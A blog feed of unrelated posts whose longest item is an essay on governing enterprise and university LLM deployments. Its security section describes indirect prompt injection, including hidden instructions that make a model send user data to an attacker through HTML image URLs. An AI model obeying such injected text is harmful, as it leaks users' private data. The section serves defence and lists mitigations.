Want to join in? Respond to our weekly writing prompts, open to everyone.
Want to join in? Respond to our weekly writing prompts, open to everyone.
from
Roscoe's Story
In Summary: * Another good day, with more quality family visiting than we've had for a long time. With the Miami / Ohio St. game currently in the 3rd qtr., I'm wondering if I'll be able to stay awake through the rest of the game. Eyes are getting heavy and the brain's starting to fog.
Prayers, etc.: My daily prayers
Health Metrics: * bw= 222.2 lbs. 100.80 kg * bp= 150/86 (67)
Exercise: * kegel pelvic floor exercise, half squats, calf raises, wall push-ups
Diet: * 06:30 – 1 banana, 1 peanut butter sandwich * 11:35 – plate of pancit * 15:00 – steak, home made vegetable soup, mashed potatoes, white rice, fresh fruit, cake
Activities, Chores, etc.: * 05:00 – listen to local news talk radio * 05:30 – read, pray, follow news reports from various sources, surf the socials, nap * 07:45 – bank accounts activity monitored * 11:23 – tuned into the ReliaQuest Bowl, Iowa Hawkeyes vs Vanderbilt Commodores, the game already in progress, Iowa leads 7 to 0 in the 1st qtr. * 11:30 to 18:00 – daughter-in-law and her fiance came over and spent the day visiting. He and I “sort of” watched Duke beat Arizona St. while doing “chores” to help the women as they fixed us a big meal. * 18:30 – listening now to NCAA Football, the Cotton Bowl Game, Miami Hurricanes vs Ohio St. Buckeyes
Chess: * 11:20 – moved in all pending CC games
from
hustin.art
The alchemist's fingers trembled as the orrery gears ground to a halt—wrong again. “Your calculations are off by 0.003 degrees, Brother Eliasz,” sneered the Archbishop's automaton, its voice like grinding cathedral pipes. Outside, the copper-plated spires of Neo-Lutetia hummed with forbidden electricity. I wiped quicksilver from my brow. “Bullshit. Your Ptolemaic models are obsolete.” The stained glass windows rattled as the celestial engines misfired. Somewhere below, the peasant riots began. The automaton's censer swung ominously. “Heresy has a price.” Damn right. I yanked the hidden lever. Let them choke on Kepler's truth for once.
from
SmarterArticles

When Stanford University's Provost charged the AI Advisory Committee in March 2024 to assess the role of artificial intelligence across the institution, the findings revealed a reality that most enterprise leaders already suspected but few wanted to admit: nobody really knows how to do this yet. The committee met seven times between March and June, poring over reports from Cornell, Michigan, Harvard, Yale, and Princeton, searching for a roadmap that didn't exist. What they found instead was a landscape of improvisation, anxiety, and increasingly urgent questions about who owns what, who's liable when things go wrong, and whether locking yourself into a single vendor's ecosystem is a feature or a catastrophic bug.
The promise is intoxicating. Large language models can answer customer queries, draft research proposals, analyse massive datasets, and generate code at speeds that make traditional software look glacial. But beneath the surface lies a tangle of governance nightmares that would make even the most seasoned IT director reach for something stronger than coffee. According to research from MIT, 95 per cent of enterprise generative AI implementations fail to meet expectations. That staggering failure rate isn't primarily a technology problem. It's an organisational one, stemming from a lack of clear business objectives, insufficient governance frameworks, and infrastructure not designed for the unique demands of inference workloads.
Let's start with the most basic question that organisations seem unable to answer consistently: who is accountable when an LLM generates misinformation, reveals confidential student data, or produces biased results that violate anti-discrimination laws?
This isn't theoretical. In 2025, researchers disclosed multiple vulnerabilities in Google's Gemini AI suite, collectively known as the “Gemini Trifecta,” capable of exposing sensitive user data and cloud assets. Around the same time, Perplexity's Comet AI browser was found vulnerable to indirect prompt injection, allowing attackers to steal private data such as emails and banking credentials through seemingly safe web pages.
The fundamental challenge is this: LLMs don't distinguish between legitimate instructions and malicious prompts. A carefully crafted input can trick a model into revealing sensitive data, executing unauthorised actions, or generating content that violates compliance policies. Studies show that as many as 10 per cent of generative AI prompts can include sensitive corporate data, yet most security teams lack visibility into who uses these models, what data they access, and whether their outputs comply with regulatory requirements.
Effective governance begins with establishing clear ownership structures. Organisations must define roles for model owners, data stewards, and risk managers, creating accountability frameworks that span the entire model lifecycle. The Institute of Internal Auditors' Three Lines Model provides a framework that some organisations have adapted for AI governance, with management serving as the first line of defence, internal audit as the second line, and the governing body as the third line, establishing the organisation's AI risk appetite and ethical boundaries.
But here's where theory meets practice in uncomfortable ways. One of the most common challenges in LLM governance is determining who is accountable for the outputs of a model that constantly evolves. Research underscores that operationalising accountability requires clear ownership, continuous monitoring, and mandatory human-in-the-loop oversight to bridge the gap between autonomous AI outputs and responsible human decision-making.
Effective generative AI governance requires establishing a RACI (Responsible, Accountable, Consulted, Informed) framework. This means identifying who is responsible for day-to-day model operations, who is ultimately accountable for outcomes, who must be consulted before major decisions, and who should be kept informed. Without this clarity, organisations risk creating accountability gaps where critical failures can occur without anyone taking ownership. The framework must also address the reality that LLMs deployed today may behave differently tomorrow, as models are updated, fine-tuned, or influenced by changing training data.
In late 2022, Samsung employees used ChatGPT to help with coding tasks, inputting proprietary source code. OpenAI's service was, at that time, using user prompts to further train their model. The result? Samsung's intellectual property potentially became part of the training data for a publicly available AI system.
This incident crystallised a fundamental tension in enterprise LLM deployment: the very thing that makes these systems useful (their ability to learn from context) is also what makes them dangerous. Fine-tuning embeds pieces of your data into the model's weights, which can introduce serious security and privacy risks. If those weights “memorise” sensitive content, the model might later reveal it to end users or attackers via its outputs.
The privacy risks fall into two main categories. First, input privacy breaches occur when data is exposed to third-party AI platforms during training. Second, output privacy issues arise when users can intentionally or inadvertently craft queries to extract private training data from the model itself. Research has revealed a mechanism in LLMs where if the model generates uncontrolled or incoherent responses, it increases the chance of revealing memorised text.
Different LLM providers handle data retention and training quite differently. Anthropic, for instance, does not use customer data for training unless there is explicit opt-in consent. Default retention is 30 days across most Claude products, but API logs shrink to seven days starting 15 September 2025. For organisations with stringent compliance requirements, Anthropic offers an optional Zero-Data-Retention addendum that ensures maximum data isolation. ChatGPT Enterprise and Business plans automatically do not use prompts or outputs for training, with no action required. However, the standard version of ChatGPT allows conversations to be reviewed by the OpenAI team and used for training future versions of the model. This distinction between enterprise and consumer tiers becomes critical when institutional data is at stake.
Universities face particular challenges because of regulatory frameworks like the Family Educational Rights and Privacy Act (FERPA) in the United States. FERPA requires schools to protect the privacy of personally identifiable information in education records. As generative artificial intelligence tools become more widespread, the risk of improper disclosure of sensitive data protected by FERPA increases.
At the University of Florida, faculty, staff, and students must exercise caution when providing inputs to AI models. Only publicly available data or data that has been authorised for use should be provided to the models. Using an unauthorised AI assistant during Zoom or Teams meetings to generate notes or transcriptions may involve sharing all content with the third-party vendor, which may use that data to train the model.
Instructors should consider FERPA guidelines before submitting student work to generative AI tools like chatbots (e.g., generating draft feedback on student work) or using tools like Zoom's AI Companion. Proper de-identification under FERPA requires removal of all personally identifiable information, as well as a reasonable determination made by the institution that a student's identity is not personally identifiable. Depending on the nature of the assignment, student work could potentially include identifiable information if they are describing personal experiences that would need to be removed.
Here's a scenario that keeps enterprise architects awake at night: you've invested eighteen months integrating OpenAI's GPT-4 into your customer service infrastructure. You've fine-tuned models, built custom prompts, trained your team, and embedded API calls throughout your codebase. Then OpenAI changes their pricing structure, deprecates the API version you're using, or introduces terms of service that conflict with your regulatory requirements. What do you do?
The answer, for most organisations, is exactly what the vendor wants you to do: nothing. Migration costs are prohibitive. A 2025 survey of 1,000 IT leaders found that 88.8 per cent believe no single cloud provider should control their entire stack, and 45 per cent say vendor lock-in has already hindered their ability to adopt better tools.
The scale of vendor lock-in extends beyond API dependencies. Gartner estimates that data egress fees consume 10 to 15 per cent of a typical cloud bill. Sixty-five per cent of enterprises planning generative AI projects say soaring egress costs are a primary driver of their multi-cloud strategy. These egress fees represent a hidden tax on migration, making it financially painful to move your data from one cloud provider to another. The vendors know this, which is why they often offer generous ingress pricing (getting your data in) whilst charging premium rates for egress (getting your data out).
So what's the escape hatch? The answer involves several complementary strategies. First, AI model gateways act as an abstraction layer between your applications and multiple model providers. Your code talks to the gateway's unified interface rather than to each vendor directly. The gateway then routes requests to the optimal underlying model (OpenAI, Anthropic, Gemini, a self-hosted LLaMA, etc.) without your application code needing vendor-specific changes.
Second, open protocols and standards are emerging. Anthropic's open-source Model Context Protocol and LangChain's Agent Protocol promise interoperability between LLM vendors. If an API changes, you don't need a complete rewrite, just a new connector.
Third, local and open-source LLMs are increasingly preferred. They're cheaper, more flexible, and allow full data control. Survey data shows strategies that are working: 60.5 per cent keep some workloads on-site for more control; 53.8 per cent use cloud-agnostic tools not tied to a single provider; 50.9 per cent negotiate contract terms for better portability.
A particularly interesting development is Perplexity's TransferEngine communication library, which addresses the challenge of running large models on AWS's Elastic Fabric Adapter by acting as a universal translator, abstracting away hardware-specific details. This means that the same code can now run efficiently on both NVIDIA's specialised hardware and AWS's more general-purpose infrastructure. This kind of abstraction layer represents the future of portable AI infrastructure.
The design principle for 2025 should be “hybrid-first, not hybrid-after.” Organisations should embed portability and data control from day one, rather than treating them as bolt-ons or manual migrations. A cloud exit strategy is a comprehensive plan that outlines how an organisation can migrate away from its current cloud provider with minimal disruption, cost, or data loss. Smart enterprises treat cloud exit strategies as essential insurance policies against future vendor dependency.
If you think negotiating a traditional SaaS contract is complicated, wait until you see what LLM vendors are putting in front of enterprise legal teams. LLM terms may appear like other software agreements, but certain terms deserve far more scrutiny. Widespread use of LLMs is still relatively new and fraught with unknown risks, so vendors are shifting the risks to customers. These products are still evolving and often unreliable, with nearly every contract containing an “AS-IS” disclaimer.
When assessing LLM vendors, enterprises should scrutinise availability, service-level agreements, version stability, and support. An LLM might perform well in standalone tests but degrade under production load, failing to meet latency SLAs or producing incomplete responses. The AI service description should be as specific as possible about what the service does. Choose data ownership and privacy provisions that align with your regulatory requirements and business needs.
Here's where things get particularly thorny: vendor indemnification for third-party intellectual property infringement claims has long been a staple of SaaS contracts, but it took years of public pressure and high-profile lawsuits for LLM pioneers like OpenAI to relent and agree to indemnify users. Only a handful of other LLM vendors have followed suit. The concern is legitimate. LLMs are trained on vast amounts of internet data, some of which may be copyrighted material. If your LLM generates output that infringes on someone's copyright, who bears the legal liability? In traditional software, the vendor typically indemnifies you. In AI contracts, vendors have tried to push this risk onto customers.
Enterprise buyers are raising their bar for AI vendors. Expect security questionnaires to add AI-specific sections that ask about purpose tags, retrieval redaction, cross-border routing, and lineage. Procurement rules increasingly demand algorithmic-impact assessments alongside security certifications for public accountability. Customers, particularly enterprise buyers, demand transparency about how companies use AI with their data. Clear governance policies, third-party certifications, and transparent AI practices become procurement requirements and competitive differentiators.
In 2025, the European Union's AI Act introduced a tiered, risk-based classification system, categorising AI systems as unacceptable, high, limited, or minimal risk. Providers of general-purpose AI now have transparency, copyright, and safety-related duties. The Act's extraterritorial reach means that organisations outside Europe must still comply if they're deploying AI systems that affect EU citizens.
In the United States, Executive Order 14179 guides how federal agencies oversee the use of AI in civil rights, national security, and public services. The White House AI Action Plan calls for creating an AI procurement toolbox managed by the General Services Administration that facilitates uniformity across the Federal enterprise. This system would allow any Federal agency to easily choose among multiple models in a manner compliant with relevant privacy, data governance, and transparency laws.
The Enterprise AI Governance and Compliance Market is expected to reach 9.5 billion US dollars by 2035, likely to surge at a compound annual growth rate of 15.8 per cent. Between 2020 and 2025, this market expanded from 0.4 billion to 2.2 billion US dollars, representing cumulative growth of 450 per cent. This explosive growth signals that governance is no longer a nice-to-have. It's a fundamental requirement for AI deployment.
ISO 42001 allows certification of an AI management system that integrates well with ISO 27001 and 27701. NIST's Generative AI profile gives a practical control catalogue and shared language for risk. Financial institutions face intense regulatory scrutiny, requiring model risk management applying OCC Bulletin 2011-12 framework to all AI/ML models with rigorous validation, independent review, and ongoing monitoring. The NIST AI Risk Management Framework offers structured, risk-based guidance for building and deploying trustworthy AI, widely adopted across industries for its practical, adaptable advice across four principles: govern, map, measure, and manage.
For organisations operating in Europe or handling European citizens' data, the General Data Protection Regulation introduces requirements that fundamentally reshape how LLM deployments must be architected. The GDPR restricts how personal data can be transferred outside the EU. Any transfer of personal data to non-EU countries must meet adequacy, Standard Contractual Clauses, Binding Corporate Rules, or explicit consent requirements. Failing to meet these conditions can result in fines up to 20 million euros or 4 per cent of global annual revenue.
Data sovereignty is about legal jurisdiction: which government's laws apply. Data residency is about physical location: where your servers actually sit. A common scenario that creates problems: a company stores European customer data in AWS Frankfurt (data residency requirement met), but database administrators access it from the US headquarters. Under GDPR, that US access might trigger cross-border transfer requirements regardless of where the data physically lives.
Sovereign AI infrastructure refers to cloud environments that are physically and legally rooted in national or EU jurisdictions. All data including training, inference, metadata, and logs must remain physically and logically located in EU territories, ensuring compliance with data transfer laws and eliminating exposure to foreign surveillance mandates. Providers must be legally domiciled in the EU and not subject to extraterritorial laws like the U.S. CLOUD Act, which allows US-based firms to share data with American authorities, even when hosted abroad.
OpenAI announced data residency in Europe for ChatGPT Enterprise, ChatGPT Edu, and the API Platform, helping organisations operating in Europe meet local data sovereignty requirements. For European companies using LLMs, best practices include only engaging providers who are willing to sign a Data Processing Addendum and act as your processor. Verify where your data will be stored and processed, and what safeguards are in place. If a provider cannot clearly answer these questions or hesitates on compliance commitments, consider it a major warning sign.
Achieving compliance with data residency and sovereignty requirements requires more than geographic awareness. It demands structured policy, technical controls, and ongoing legal alignment. Hybrid cloud architectures enable global orchestration with localised data processing to meet residency requirements without sacrificing performance.
The economics of self-hosted versus cloud-based LLM deployment present a decision tree that looks deceptively simple on the surface but becomes fiendishly complex when you factor in hidden costs and the rate of technological change.
Here's the basic arithmetic: you need more than 8,000 conversations per day to see the cost of having a relatively small model hosted on your infrastructure surpass the managed solution by cloud providers. Self-hosted LLM deployments involve substantial upfront capital expenditures. High-end GPU configurations suitable for large model inference can cost 100,000 to 500,000 US dollars or more, depending on performance requirements.
To generate approximately one million tokens (about as much as an A80 GPU can produce in a day), it would cost 0.12 US dollars on DeepInfra via API, 0.71 US dollars on Azure AI Foundry via API, 43 US dollars on Lambda Labs, or 88 US dollars on Azure servers. In practice, even at 100 million tokens per day, API costs (roughly 21 US dollars per day) are so low that it's hard to justify the overhead of self-managed GPUs on cost alone.
But cost isn't the only consideration. Self-hosting offers more control over data privacy since the models operate on the company's own infrastructure. This setup reduces the risk of data breaches involving third-party vendors and allows implementing customised security protocols. Open-source LLMs work well for research institutions, universities, and businesses that handle high volumes of inference and need models tailored to specific requirements. By self-hosting open-source models, high-throughput organisations can avoid the growing per-token fees associated with proprietary APIs.
However, hosting open-source LLMs on your own infrastructure introduces variable costs that depend on factors like hardware setup, cloud provider rates, and operational requirements. Additional expenses include storage, bandwidth, and associated services. Open-source models rely on internal teams to handle updates, security patches, and performance tuning. These ongoing tasks contribute to the daily operational budget and influence long-term expenses.
For flexibility and cost-efficiency with low or irregular traffic, LLM-as-a-Service is often the best choice. LLMaaS platforms offer compelling advantages for organisations seeking rapid AI adoption, minimal operational complexity, and scalable cost structures. The subscription-based pricing models provide cost predictability and eliminate large upfront investments, making AI capabilities accessible to organisations of all sizes.
Universities face a unique challenge: they need to balance pedagogical openness with security and privacy requirements. The mission of higher education includes preparing students for a world where AI literacy is increasingly essential. Banning these tools outright would be pedagogically irresponsible. But allowing unrestricted access creates governance nightmares.
At Stanford, the MBA and MSx programmes allow instructors to not ban student use of AI tools for take-home coursework, including assignments and examinations. Instructors may choose whether to allow student use of AI tools for in-class work. PhD and undergraduate courses follow the Generative AI Policy Guidance from Stanford's Office of Community Standards. This tiered approach recognises that different educational contexts require different policies.
The 2025 EDUCAUSE AI Landscape Study revealed that fewer than 40 per cent of higher education institutions surveyed have AI acceptable use policies. Many institutions do not yet have a clear, actionable AI strategy, practical guidance, or defined governance structures to manage AI use responsibly. Key takeaways from the study include a rise in strategic prioritisation of AI, growing institutional governance and policies, heavy emphasis on faculty and staff training, widespread AI use for teaching and administrative tasks, and notable disparities in resource distribution between larger and smaller institutions.
Universities face particular challenges around academic integrity. Research shows that 89 per cent of students admit to using AI tools like ChatGPT for homework. Studies report that approximately 46.9 per cent of students use LLMs in their coursework, with 39 per cent admitting to using AI tools to answer examination or quiz questions.
Universities primarily use Turnitin, Copyleaks, and GPTZero for AI detection, spending 2,768 to 110,400 US dollars per year on these tools. Many top schools deactivated AI detectors in 2024 to 2025 due to approximately 4 per cent false positive rates. It can be very difficult to accurately detect AI-generated content, and detection tools claim to identify work as AI-generated but cannot provide evidence for that claim. Human experts who have experience with using LLMs for writing tasks can detect AI with 92 per cent accuracy, though linguists without such experience were not able to achieve the same level of accuracy.
Experts recommend the use of both human reasoning and automated detection. It is considered unfair to exclusively use AI detection to evaluate student work due to false positive rates. After receiving a positive prediction, next steps should include evaluating the student's writing process and comparing the flagged text to their previous work. Institutions must clearly and consistently articulate their policies on academic integrity, including explicit guidelines on appropriate and inappropriate use of AI tools, whilst fostering open dialogues about ethical considerations and the value of original academic work.
Whilst fine-tuning models with proprietary data introduces significant privacy risks, Retrieval-Augmented Generation has emerged as a safer and more cost-effective approach for injecting organisational knowledge into enterprise AI systems. According to Gartner, approximately 80 per cent of enterprises are utilising RAG methods, whilst about 20 per cent are employing fine-tuning techniques.
RAG operates through two core phases. First comes ingestion, where enterprise content is encoded into dense vector representations called embeddings and indexed so relevant items can be efficiently retrieved. This preprocessing step transforms documents, database records, and other unstructured content into a machine-readable format that enables semantic search. Second is retrieval and generation. For a user query, the system retrieves the most relevant snippets from the indexed knowledge base and augments the prompt sent to the LLM. The model then synthesises an answer that can include source attributions, making the response both more accurate and transparent.
By grounding responses in retrieved facts, RAG reduces the likelihood of hallucinations. When an LLM generates text based on retrieved documents rather than attempting to recall information from training, it has concrete reference material to work with. This doesn't eliminate hallucinations entirely (models can still misinterpret retrieved content) but it substantially improves reliability compared to purely generative approaches. RAG delivers substantial return on investment, with organisations reporting 30 to 60 per cent reduction in content errors, 40 to 70 per cent faster information retrieval, and 25 to 45 per cent improvement in employee productivity.
RAG Vector-Based AI leverages vector embeddings to retrieve semantically similar data from dense vector databases, such as Pinecone or Weaviate. The approach is based on vector search, a technique that converts text into numerical representations (vectors) and then finds documents that are most similar to a user's query. Research findings reveal that enterprise adoption is largely in the experimental phase: 63.6 per cent of implementations utilise GPT-based models, and 80.5 per cent rely on standard retrieval frameworks such as FAISS or Elasticsearch.
A strong data governance framework is foundational to ensuring the quality, integrity, and relevance of the knowledge that fuels RAG systems. Such a framework encompasses the processes, policies, and standards necessary to manage data assets effectively throughout their lifecycle. From data ingestion and storage to processing and retrieval, governance practices ensure that the data driving RAG solutions remain trustworthy and fit for purpose. Ensuring data privacy and security within a RAG-enhanced knowledge management system is critical. To make sure RAG only retrieves data from authorised sources, companies should implement strict role-based permissions, multi-factor authentication, and encryption protocols.
When it comes to enterprise-grade LLM platforms, three dominant cloud providers have emerged. The AI landscape in 2025 is defined by Azure AI Foundry (Microsoft), AWS Bedrock (Amazon), and Google Vertex AI. Each brings a unique approach to generative AI, from model offerings to fine-tuning, MLOps, pricing, and performance.
Azure OpenAI distinguishes itself by offering direct access to robust models like OpenAI's GPT-4, DALL·E, and Whisper. Recent additions include support for xAI's Grok Mini and Anthropic Claude. For teams whose highest priority is access to OpenAI's flagship GPT models within an enterprise-grade Microsoft environment, Azure OpenAI remains best fit, especially when seamless integration with Microsoft 365, Cognitive Search, and Active Directory is needed.
Azure OpenAI is hosted within Microsoft's highly compliant infrastructure. Features include Azure role-based access control, Customer Lockbox (requiring customer approval before Microsoft accesses data), private networking to isolate model endpoints, and data-handling transparency where customer prompts and responses are not stored or used for training. Azure OpenAI supports HIPAA, GDPR, ISO 27001, SOC 1/2/3, FedRAMP High, HITRUST, and more. Azure offers more on-premises and hybrid cloud deployment options compared to Google, enabling organisations with strict data governance requirements to maintain greater control.
Google Cloud Vertex AI stands out with its strong commitment to open source. As the creators of TensorFlow, Google has a long history of contributing to the open-source AI community. Vertex AI offers an unmatched variety of over 130 generative AI models, advanced multimodal capabilities, and seamless integration with Google Cloud services.
Organisations focused on multi-modal generative AI, rapid low-code agent deployment, or deep integration with Google's data stack will find Vertex AI a compelling alternative. For enterprises with large datasets, Vertex AI's seamless connection with BigQuery enables powerful analytics and predictive modelling. Google Vertex AI is more cost-effective, providing a quick return on investment with its scalable models.
The most obvious difference is in Google Cloud's developer and API focus, whereas Azure is geared more towards building user-friendly cloud applications. Enterprise applications benefit from each platform's specialties: Azure OpenAI excels in Microsoft ecosystem integration, whilst Google Vertex AI excels in data analytics. For teams using AWS infrastructure, AWS Bedrock provides access to multiple foundation models from different providers, offering a middle ground between Azure's Microsoft-centric approach and Google's open-source philosophy.
In AI security vulnerabilities reported to Microsoft, indirect prompt injection is one of the most widely-used techniques. It is also the top entry in the OWASP Top 10 for LLM Applications and Generative AI 2025. A prompt injection vulnerability occurs when user prompts alter the LLM's behaviour or output in unintended ways.
With a direct prompt injection, an attacker explicitly provides a cleverly crafted prompt that overrides or bypasses the model's intended safety and content guidelines. With an indirect prompt injection, the attack is embedded in external data sources that the LLM consumes and trusts. The rise of multimodal AI introduces unique prompt injection risks. Malicious actors could exploit interactions between modalities, such as hiding instructions in images that accompany benign text.
One of the most widely-reported impacts is the exfiltration of the user's data to the attacker. The prompt injection causes the LLM to first find and/or summarise specific pieces of the user's data and then to use a data exfiltration technique to send these back to the attacker. Several data exfiltration techniques have been demonstrated, including data exfiltration through HTML images, causing the LLM to output an HTML image tag where the source URL is the attacker's server.
Security controls should combine input/output policy enforcement, context isolation, instruction hardening, least-privilege tool use, data redaction, rate limiting, and moderation with supply-chain and provenance controls, egress filtering, monitoring/auditing, and evaluations/red-teaming.
Microsoft recommends preventative techniques like hardened system prompts and Spotlighting to isolate untrusted inputs, detection tools such as Microsoft Prompt Shields integrated with Defender for Cloud for enterprise-wide visibility, and impact mitigation through data governance, user consent workflows, and deterministic blocking of known data exfiltration methods.
Security leaders should inventory all LLM deployments (you can't protect what you don't know exists), discover shadow AI usage across your organisation, deploy real-time monitoring and establish behavioural baselines, integrate LLM security telemetry with existing SIEM platforms, establish governance frameworks mapping LLM usage to compliance requirements, and test continuously by red teaming models with adversarial prompts. Traditional IT security models don't fully capture the unique risks of AI systems. You need AI-specific threat models that account for prompt injection, model inversion attacks, training data extraction, and adversarial inputs designed to manipulate model behaviour.
So what are organisations that are succeeding actually doing differently? The pattern that emerges from successful deployments is not particularly glamorous: it's governance all the way down.
Organisations that had AI governance programmes in place before the generative AI boom were generally able to better manage their adoption because they already had a committee up and running that had the mandate and the process in place to evaluate and adopt generative AI use cases. They already had policies addressing unique risks associated with AI applications, including privacy, data governance, model risk management, and cybersecurity.
Establishing ownership with a clear responsibility assignment framework prevents rollout failure and creates accountability across security, legal, and engineering teams. Success in enterprise AI governance requires commitment from the highest levels of leadership, cross-functional collaboration, and a culture that values both innovation and responsible deployment. Foster collaboration between IT, security, legal, and compliance teams to ensure a holistic approach to LLM security and governance.
Organisations that invest in robust governance frameworks today will be positioned to leverage AI's transformative potential whilst maintaining the trust of customers, regulators, and stakeholders. In an environment where 95 per cent of implementations fail to meet expectations, the competitive advantage goes not to those who move fastest, but to those who build sustainable, governable, and defensible AI capabilities.
The truth is that we're still in the early chapters of this story. The governance models, procurement frameworks, and security practices that will define enterprise AI in a decade haven't been invented yet. They're being improvised right now, in conference rooms and committee meetings at universities and companies around the world. The organisations that succeed will be those that recognise this moment for what it is: not a race to deploy the most powerful models, but a test of institutional capacity to govern unprecedented technological capability.
The question isn't whether your organisation will use large language models. It's whether you'll use them in ways that you can defend when regulators come knocking, that you can migrate away from when better alternatives emerge, and that your students or customers can trust with their data. That's a harder problem than fine-tuning a model or crafting the perfect prompt. But it's the one that actually matters.

Tim Green UK-based Systems Theorist & Independent Technology Writer
Tim explores the intersections of artificial intelligence, decentralised cognition, and posthuman ethics. His work, published at smarterarticles.co.uk, challenges dominant narratives of technological progress while proposing interdisciplinary frameworks for collective intelligence and digital stewardship.
His writing has been featured on Ground News and shared by independent researchers across both academic and technological communities.
ORCID: 0009-0002-0156-9795 Email: tim@smarterarticles.co.uk
from hamsterdam
My current view of crypto is that it's a very novel technology in search of a use and so far it hasn't found one that is either important to a lot of people, or that it is actually good at solving. This is why a lot of the pro crypto arguments follow a pattern I call 'kitchen sink' arguments. Crypto is a novel technology, it must be useful for something. Maybe it's good at being a currency, digital assets, smart contracts, stores of value, decentralization of something, etc, etc.
It's interesting to unpack these. In many cases the thing exists already, minus the decentralization. For example, we have digital assets today. I have digital loot in my video games, but that's not what crypto people mean because it's not decentralized. They imagine a world where your loot from world of warcraft can follow you into fortnite, or something weird like that. It turns out this is both very hard, game companies can't balance the economies of their games if they can't control them, and people don't really care that much about it. It turns out they want a fun game more than they care about decentralized loot.
This may seem like a trivial example, so let's look at a more serious one. Today most dollars are in fact digital. They're just records in bank's traditional databases. Digital currencies already exist and work fine without blockchains.
This leads us to the important question, what benefit is crypto? The big “benefit” offered is typically decentralization, but I don't think this is a benefit at all. First, banks help people avoid bad things. In crypto, if you lose your key, you lose your money. There is no remedy. With a bank, if you lose your password or your atm card, or whatever, you can still get access to your money. Score 1 for traditional money.
Second, if someone gets you to give them your key and they steal your money you have absolutely no recourse. Your money is gone forever. This has happened to many tech savvy crypto investors. Can you imagine if regular people used crypto how often they'd lose their life savings! Score 2 for traditional money.
So what is the benefit of decentralization? First, it's important to recognize that modern money is already decentralized to some degree. Bank A doesn't have to coordinate with Bank B unless money is passing between them.
Putting that aside, the most common arguments for crypto are censorship resistance and immutability. No government or corporation can freeze your account, reverse your transactions, or seize your assets. Code is law. The blockchain is immutable. No central authority can override the rules.
Unfortunately none of these claims of decentralization are actually true. The guarantees evaporate when “they” decide it's inconvenient. In 2016, someone exploited a vulnerability in The DAO (a major Ethereum project) and drained about $50-60 million worth of ETH. The Ethereum community faced a choice: stick to the “code is law” principle and let the hacker keep the money, or reverse the transactions to return the stolen funds. They chose to reverse it via a hard fork, effectively rewinding the blockchain and undoing the hack.
So much for immutability. It turns out decentralization doesn't apply to everyone. When enough money was at stake for the right people, the supposedly immutable blockchain became mutable. The decentralization benefit that crypto advocates tout simply disappeared when tested in the real world. Now ask yourself, who made this decision? What voice do you have with the people that can change the blockchain? In the US we have a democracy where you get to vote for the people that make these decisions with respect to the dollar and you know who they are. What do you have in crypto, an un-elected and often unknown group of decision makers that have no accountability to you. Score 3 for traditional money.
This is the pattern with crypto, it's a solution looking for a problem, and when you examine the problems it claims to solve, either the problem doesn't really exist, people don't care about it, or crypto doesn't solve it better than existing solutions.
from
Jujupiter
On New Year’s Day, I put out a playlist that contains the 100 tracks I discovered the previous year that I’ve enjoyed the most. So here is my Best Of 2025 in music: BO2025 – hope you enjoy.

from
The happy place
It’s 2026 I embrace it with both arms
Even the small black dog — which looks like a lion — has celebrated by taking a cucumber stick in the corner of his mouth, pretending to smoke it like a cigar; then having done that, he shat on the living room floor. Now he is sleeping peacefully on the sofa next to me.
I will try to use his casual happy go lucky attitude as an inspiration now for myself as I enter this new year with three pair of eyes: normal, glasses and finally the pair I opened to the undercurrents. They too are a pair, because they so accurately measure depth…
May this year be the best one in several decades!!
So say we all.
Speaking of which, I saw the dogs circular chewing bone earlier today. It reminded me of the chakram: a circular throwing weapon made famous by Xena.
That’s a powerful woman whose courage I shall also be inspired with
As well as her desire to good, with or without baggage. Make up for all of the past which cannot be changed.
and finally captain Janeway: coffee: black! Doing the right thing, acting on what is known! Leaving none behind!
Let’s go do you feel it
Do your best
It’s all you got

It is New Year’s Eve as I write this. Tomorrow not only marks the start of the Year of our Lord, 2026, it also marks the end of the first week of Christmas. The feast for that is one that we call the feast of the Holy Name of Jesus, but this is a more recent name. For much of Christian history, this has been known as the Feast of the Circumcision.
The readings for the day reflect this: “After eight days had passed, it was time to circumcise the child; and he was called Jesus, the name given by the angel before he was conceived in the womb” (Luke 2:21 NRSV). Matthew keeps thing brief by simply noting that Joseph names Jesus (indeed, the actual birth of Jesus more or less happens “off camera” in Matthew’s gospel). In Jewish custom, a male child is circumcised on the eighth day after birth, the number eight being significant as a marker of a new beginning. It was also the custom to declare the child’s name for the first time.
It is curious to me that we in the Episcopal Church opt to ignore the circumcision aspects of the feast day, especially given the fact that we’ve begun addressing areas prone to anti-Semitic interpretation in our liturgical calendar (with a lot of focus on how various readings from John’s gospel have been misconstrued for anti-Semitic purposes over the centuries). That Jesus was incarnate as a Jew is central to understanding Him. His being circumcised is what denotes Him as a Jew.
The scholar Susannah Heschel, the daughter of the great Abraham Heschel, wrote an excellent-though-disturbing book entitled Aryan Jesus that traces the development of Nazi theology and the anti-Semitic threads that ran through German theology going back at least as far as Martin Luther (who was famously anti-Semitic). She places a degree of importance on the liberal theological developments of the late 1800s and early 1900s and how much work was done to distance Jesus from His Jewish identity. Many of the scholars and theologians from this time managed to survive WWII and wound up working in American universities and seminaries. Since the US did not treat such academics as Nazis or Nazi sympathizers, they were able to operate fairly unnoticed, continuing to articulate a Jesus quite divorced from His Jewish heritage.
We see two lasting legacies of this work. The first is the continued treatment of gnosticism as a kind of suppressed “true” version of Christianity that the Church felt threatened by. One of the hallmarks of Christian gnostic ideas is that the God of Judaism is an evil being called the “Demiurge” who wants to enslave humanity in our material existence (with Jesus representing a true God of light that wants to free us from the corruptions of our flesh and materiality). Such gnostic ideas find a degree of resonance with schools of Buddhism, and this is the other legacy of the volkish, Nazi-adjacent theologies of early-20th Century German theology: the attempts to connect Jesus with Buddha. Putting Jesus closer to Buddhism takes Him further away from His Jewishness. Ironically, some of the most avowedly “progressive” people I know unwittingly subscribe to a theological line that was created by vile anti-Semites, but do so out of some desire to be inclusive.

The much-celebrated theologian Stanley Hauerwas says that Christians cannot be properly Christian without understanding themselves as Jewish first. In that same vein he would argue that Jesus cannot be properly understood without knowing Him as a Jew. Which means that we should be talking about the Feast of the Circumcision, even if the topic is uncomfortable. It is the only right and proper thing to do if we are serious about resisting anti-Semitism in our religion.
